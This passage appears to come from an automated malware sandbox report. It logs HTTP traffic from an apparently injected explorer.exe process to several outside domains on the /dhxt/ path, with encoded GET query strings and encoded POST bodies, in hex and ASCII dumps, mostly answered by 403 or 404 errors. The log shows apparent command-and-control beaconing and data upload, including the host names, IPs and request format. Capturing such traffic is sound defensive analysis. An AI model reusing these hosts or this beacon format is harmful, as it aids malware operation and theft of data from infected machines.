                                                                                                              Accept: */*
                                                                                                              Referer: http://www.ontheverge.wales/dhxt/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Raw: 55 6c 6b 41 48 6e 73 49 3d 49 64 6d 39 75 39 39 6c 67 59 28 6d 66 51 57 5f 57 77 33 2d 76 33 36 6c 35 70 79 2d 55 62 65 49 48 4e 75 51 6d 78 50 6d 4d 74 4a 79 78 51 55 32 78 4c 4c 4f 7e 67 5a 62 33 30 61 36 50 42 64 70 70 33 68 2d 65 52 72 66 79 64 75 66 6f 6c 48 70 54 65 38 76 74 44 77 5f 48 7a 37 78 46 46 76 79 61 36 52 54 58 41 38 4d 7a 75 44 41 4a 75 55 43 32 34 6b 70 73 47 4e 51 28 74 74 73 48 33 50 5f 50 38 70 65 35 6d 58 4a 64 76 50 4d 30 42 52 42 4f 6f 61 4d 78 79 38 78 5a 61 47 77 52 33 68 30 64 41 4b 69 36 61 4f 31 64 38 51 4b 47 47 4d 2d 78 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: UlkAHnsI=Idm9u99lgY(mfQW_Ww3-v36l5py-UbeIHNuQmxPmMtJyxQU2xLLO~gZb30a6PBdpp3h-eRrfydufolHpTe8vtDw_Hz7xFFvya6RTXA8MzuDAJuUC24kpsGNQ(ttsH3P_P8pe5mXJdvPM0BRBOoaMxy8xZaGwR3h0dAKi6aO1d8QKGGM-xQ).
                                                                                                              Feb 6, 2023 14:39:46.313869953 CET281INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx
                                                                                                              Date: Mon, 06 Feb 2023 13:39:46 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Content-Encoding: gzip
                                                                                                              Data Raw: 36 36 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 b3 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 43 94 24 e5 a7 54 da d9 24 a7 e6 95 a4 16 d9 d9 a4 64 96 01 f5 1a 82 b4 00 15 18 da d9 e8 c3 44 90 0c 00 8b c3 74 e8 43 0c d0 07 5b 0b 00 14 ea 03 0f 7d 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 66(HML),I310Vp/JLIIC$T$dDtC[}0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              2192.168.2.449697172.67.156.5880C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:38:33.632235050 CET130OUTGET /dhxt/?UlkAHnsI=iu/H8WHS+bo1nMJvRdq/iC6svF2/HYXNnbtNRbi1LgexvtsRTtlIctNP2ExBqlFb1kQrkeEU0URUxcClbqwbX/pXEbDFcWstrA==&2ani-=qhGAdkIKoH HTTP/1.1
                                                                                                              Host: www.b-yy.xyz
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Feb 6, 2023 14:38:33.877207041 CET131INHTTP/1.1 404 Not Found
                                                                                                              Date: Mon, 06 Feb 2023 13:38:33 GMT
                                                                                                              Content-Type: text/plain
                                                                                                              Content-Length: 0
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NeWCa93mAUJpJ7d3uXcI45gX%2FeiIB3HEfHTgDrNM9dRIP219L1MlPaXBY0gtt2LOd7VXVgjxMjZE51%2FbVtHleRMfzDt8DlBQrMc0fX6VmtONiKNKvWtc91LpL4I2r1U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 795449703be33734-FRA
                                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              20192.168.2.4497153.127.73.21680C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:39:48.846231937 CET282OUTGET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=FfOdtLZjvYP8bXm/clPh5g/7x4+RQqyIHbKOkwKrIc0A7AIax+WKqABy5xS4eERJuSBeHh7W6Lqe0kjzR+0vnl8saQ3UdmHxRw== HTTP/1.1
                                                                                                              Host: www.ontheverge.wales
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Feb 6, 2023 14:39:48.868232012 CET282INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx
                                                                                                              Date: Mon, 06 Feb 2023 13:39:48 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 125
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              21192.168.2.449716164.88.122.25080C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:39:54.498359919 CET284OUTPOST /dhxt/ HTTP/1.1
                                                                                                              Host: www.0w3jy.com
                                                                                                              Connection: close
                                                                                                              Content-Length: 190
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.0w3jy.com
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.0w3jy.com/dhxt/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Raw: 55 6c 6b 41 48 6e 73 49 3d 49 57 4b 32 54 63 42 6b 75 42 59 66 42 41 45 79 50 58 6c 6b 54 37 56 56 57 58 78 37 62 7a 6c 6b 61 6c 4b 6d 47 6f 42 49 76 6d 57 5a 58 4c 4d 61 6a 34 48 50 67 31 6e 39 6a 63 64 67 39 62 6c 79 70 75 63 56 69 77 57 6f 65 55 30 70 37 5a 38 76 4e 44 5a 39 76 45 54 6a 6b 77 6c 79 45 72 68 46 4d 44 71 53 57 66 31 44 56 4a 6f 74 7a 63 65 73 44 59 67 63 66 6f 62 37 6b 4f 77 69 7a 30 69 53 59 6b 49 79 74 56 56 4b 53 66 30 30 35 68 6e 5f 43 51 49 6a 71 4f 43 62 69 63 4f 66 4a 78 51 79 4d 4e 47 4d 52 2d 5a 52 6e 61 53 72 7a 44 55 31 37 41 29 2e 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: UlkAHnsI=IWK2TcBkuBYfBAEyPXlkT7VVWXx7bzlkalKmGoBIvmWZXLMaj4HPg1n9jcdg9blypucViwWoeU0p7Z8vNDZ9vETjkwlyErhFMDqSWf1DVJotzcesDYgcfob7kOwiz0iSYkIytVVKSf005hn_CQIjqOCbicOfJxQyMNGMR-ZRnaSrzDU17A).
                                                                                                              Feb 6, 2023 14:39:54.828010082 CET285INHTTP/1.1 404
                                                                                                              Set-Cookie: JSESSIONID=A2C4AD7E85D2752EF8497A9F15289DC6; Path=/; HttpOnly
                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                              Content-Length: 3627
                                                                                                              Date: Mon, 06 Feb 2023 13:39:52 GMT
                                                                                                              Connection: close
                                                                                                              Data Raw: 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 e9 a1 b5 e9 9d a2 e4 b8 8d e5 ad 98 e5 9c a8 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 2c 49 45 3d 39 2c 49 45 3d 31 30 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 22 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 73 74 31 2e 63 6e 2f 73 74 61 74 69 63 5f 76 69 70 5f 66 65 6e 67 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 31 2e 38 2e 33 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 73 74 31 2e 63 6e 2f 73 74 61 74 69 63 5f 76 69 70 5f 66 65 6e 67 2f 62 6f 6f 74 73 74 72 61 70 2f 32 2e 33 2e 31 2f 63 73 73 5f 63 65 72 75 6c 65 61 6e 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 73 74 31 2e 63 6e 2f 73 74 61 74 69 63 5f 76 69 70 5f 66 65 6e 67 2f 62 6f 6f 74 73 74 72 61 70 2f 32 2e 33 2e 31 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 73 74 31 2e 63 6e 2f 73 74 61 74 69 63 5f 76 69 70 5f 66 65 6e 67 2f 62 6f 6f 74 73 74 72 61 70 2f 32 2e 33 2e 31 2f 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 37 5d 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 73 74 31 2e 63 6e 2f 73 74 61 74 69 63 5f 76 69 70 5f 66 65 6e 67 2f 62 6f 6f 74 73 74 72 61 70 2f 32 2e 33 2e 31 2f 61 77 65 73 6f 6d 65 2f 66 6f 6e 74 2d 61
                                                                                                              Data Ascii: <!DOCTYPE html><html><head><title>404 - </title><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><meta name="author" content=""/><meta name="renderer" content="webkit"><meta http-equiv="X-UA-Compatible" content="IE=8,IE=9,IE=10" /><meta http-equiv="Expires" content="0"><meta http-equiv="Cache-Control" content="no-cache"><meta http-equiv="Cache-Control" content="no-store"><script src="//static.st1.cn/static_vip_feng/jquery/jquery-1.8.3.min.js" type="text/javascript"></script><link href="//static.st1.cn/static_vip_feng/bootstrap/2.3.1/css_cerulean/bootstrap.min.css" type="text/css" rel="stylesheet" /><script src="//static.st1.cn/static_vip_feng/bootstrap/2.3.1/js/bootstrap.min.js" type="text/javascript"></script><link href="//static.st1.cn/static_vip_feng/bootstrap/2.3.1/awesome/css/font-awesome.min.css" type="text/css" rel="stylesheet" />...[if lte IE 7]><link href="//static.st1.cn/static_vip_feng/bootstrap/2.3.1/awesome/font-a
                                                                                                              Feb 6, 2023 14:39:54.828052044 CET286INData Raw: 77 65 73 6f 6d 65 2d 69 65 37 2e 6d 69 6e 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49
                                                                                                              Data Ascii: wesome-ie7.min.css" type="text/css" rel="stylesheet" /><![endif]-->...[if lte IE 6]><link href="//static.st1.cn/static_vip_feng/bootstrap/bsie/css/bootstrap-ie6.min.css" type="text/css" rel="stylesheet" /><script src="//static.st1.cn/stat
                                                                                                              Feb 6, 2023 14:39:54.828073978 CET288INData Raw: 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 73 74 31 2e 63 6e 2f 73 74 61 74 69 63 5f 76 69 70 5f 66 65 6e 67 2f 63 6f 6d 6d 6f 6e 2f 6d 75 73 74 61 63 68 65 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63
                                                                                                              Data Ascii: ipt src="//static.st1.cn/static_vip_feng/common/mustache.min.js" type="text/javascript"></script><link href="//static.st1.cn/static_vip_feng/common/bcsite.min.css" type="text/css" rel="stylesheet" /><script src="//static.st1.cn/static_vip_


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              22192.168.2.449717164.88.122.25080C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:39:57.346777916 CET288OUTGET /dhxt/?UlkAHnsI=FUiWQqlvvhcOKQQuFFk1YdMODVpPUkI9QkHdYK1vvGDvQckHnduU+ib0kpFdu5Ayi+Be8xCaUG88sYAzbmt0txmA9iBLGYJGLw==&2ani-=qhGAdkIKoH HTTP/1.1
                                                                                                              Host: www.0w3jy.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Feb 6, 2023 14:39:57.682760954 CET290INHTTP/1.1 404
                                                                                                              Set-Cookie: JSESSIONID=72EFB16ABEFDD907EC10005AFC0C81CB; Path=/; HttpOnly
                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                              Content-Length: 3627
                                                                                                              Date: Mon, 06 Feb 2023 13:39:54 GMT
                                                                                                              Connection: close
                                                                                                              Data Raw: 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 e9 a1 b5 e9 9d a2 e4 b8 8d e5 ad 98 e5 9c a8 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 2c 49 45 3d 39 2c 49 45 3d 31 30 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 22 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 73 74 31 2e 63 6e 2f 73 74 61 74 69 63 5f 76 69 70 5f 66 65 6e 67 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 31 2e 38 2e 33 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 73 74 31 2e 63 6e 2f 73 74 61 74 69 63 5f 76 69 70 5f 66 65 6e 67 2f 62 6f 6f 74 73 74 72 61 70 2f 32 2e 33 2e 31 2f 63 73 73 5f 63 65 72 75 6c 65 61 6e 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 73 74 31 2e 63 6e 2f 73 74 61 74 69 63 5f 76 69 70 5f 66 65 6e 67 2f 62 6f 6f 74 73 74 72 61 70 2f 32 2e 33 2e 31 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 73 74 31 2e 63 6e 2f 73 74 61 74 69 63 5f 76 69 70 5f 66 65 6e 67 2f 62 6f 6f 74 73 74 72 61 70 2f 32 2e 33 2e 31 2f 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 37 5d 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 73 74 31 2e 63 6e 2f 73 74 61 74 69 63 5f 76 69 70 5f 66 65 6e 67 2f 62 6f 6f 74 73 74 72 61 70 2f 32 2e 33 2e 31 2f 61 77 65 73 6f 6d 65 2f 66 6f 6e 74 2d 61
                                                                                                              Data Ascii: <!DOCTYPE html><html><head><title>404 - </title><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><meta name="author" content=""/><meta name="renderer" content="webkit"><meta http-equiv="X-UA-Compatible" content="IE=8,IE=9,IE=10" /><meta http-equiv="Expires" content="0"><meta http-equiv="Cache-Control" content="no-cache"><meta http-equiv="Cache-Control" content="no-store"><script src="//static.st1.cn/static_vip_feng/jquery/jquery-1.8.3.min.js" type="text/javascript"></script><link href="//static.st1.cn/static_vip_feng/bootstrap/2.3.1/css_cerulean/bootstrap.min.css" type="text/css" rel="stylesheet" /><script src="//static.st1.cn/static_vip_feng/bootstrap/2.3.1/js/bootstrap.min.js" type="text/javascript"></script><link href="//static.st1.cn/static_vip_feng/bootstrap/2.3.1/awesome/css/font-awesome.min.css" type="text/css" rel="stylesheet" />...[if lte IE 7]><link href="//static.st1.cn/static_vip_feng/bootstrap/2.3.1/awesome/font-a
                                                                                                              Feb 6, 2023 14:39:57.682811022 CET291INData Raw: 77 65 73 6f 6d 65 2d 69 65 37 2e 6d 69 6e 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49
                                                                                                              Data Ascii: wesome-ie7.min.css" type="text/css" rel="stylesheet" /><![endif]-->...[if lte IE 6]><link href="//static.st1.cn/static_vip_feng/bootstrap/bsie/css/bootstrap-ie6.min.css" type="text/css" rel="stylesheet" /><script src="//static.st1.cn/stat
                                                                                                              Feb 6, 2023 14:39:57.682852030 CET292INData Raw: 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 73 74 31 2e 63 6e 2f 73 74 61 74 69 63 5f 76 69 70 5f 66 65 6e 67 2f 63 6f 6d 6d 6f 6e 2f 6d 75 73 74 61 63 68 65 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63
                                                                                                              Data Ascii: ipt src="//static.st1.cn/static_vip_feng/common/mustache.min.js" type="text/javascript"></script><link href="//static.st1.cn/static_vip_feng/common/bcsite.min.css" type="text/css" rel="stylesheet" /><script src="//static.st1.cn/static_vip_


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              23192.168.2.44971881.169.145.7280C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:40:02.849679947 CET293OUTPOST /dhxt/ HTTP/1.1
                                                                                                              Host: www.frogair.online
                                                                                                              Connection: close
                                                                                                              Content-Length: 190
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.frogair.online
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.frogair.online/dhxt/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Raw: 55 6c 6b 41 48 6e 73 49 3d 6a 38 62 45 75 54 58 55 54 58 28 44 42 65 69 76 7a 61 44 6a 31 6b 72 4d 32 69 50 36 57 78 66 6d 78 53 50 31 69 70 32 56 28 67 6c 46 48 39 75 70 66 45 30 4b 4c 30 5a 6f 79 77 54 42 41 6f 72 37 31 5a 7a 42 45 5a 61 62 48 4b 76 50 50 68 74 30 46 75 44 6e 4b 44 79 6d 52 32 42 50 4a 54 63 35 5a 75 41 37 4d 59 72 33 51 36 49 74 4a 72 6a 66 4e 31 4c 62 68 79 6a 32 67 4e 4a 49 69 41 42 4c 46 69 78 31 73 71 76 41 6e 61 54 64 6d 50 78 54 74 7a 7a 68 4f 46 71 66 53 55 77 56 4e 30 37 2d 4e 6c 70 70 33 6e 47 64 56 77 68 55 59 68 4f 4b 45 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: UlkAHnsI=j8bEuTXUTX(DBeivzaDj1krM2iP6WxfmxSP1ip2V(glFH9upfE0KL0ZoywTBAor71ZzBEZabHKvPPht0FuDnKDymR2BPJTc5ZuA7MYr3Q6ItJrjfN1Lbhyj2gNJIiABLFix1sqvAnaTdmPxTtzzhOFqfSUwVN07-Nlpp3nGdVwhUYhOKEQ).
                                                                                                              Feb 6, 2023 14:40:02.872836113 CET294INHTTP/1.1 404 Not Found
                                                                                                              Date: Mon, 06 Feb 2023 13:40:02 GMT
                                                                                                              Server: Apache/2.4.55 (Unix)
                                                                                                              Content-Length: 196
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              24192.168.2.44971981.169.145.7280C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:40:05.410651922 CET294OUTGET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=u+zktjrvfgHZI+Oz0oPk7S6z3SS4eQzlxj31ise38TMlPN2sQxJreAld73CkW67638HFSoqfGq7wTiBJHuDRXWnGAUEuFgsZZw== HTTP/1.1
                                                                                                              Host: www.frogair.online
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Feb 6, 2023 14:40:05.433163881 CET295INHTTP/1.1 404 Not Found
                                                                                                              Date: Mon, 06 Feb 2023 13:40:05 GMT
                                                                                                              Server: Apache/2.4.55 (Unix)
                                                                                                              Content-Length: 196
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
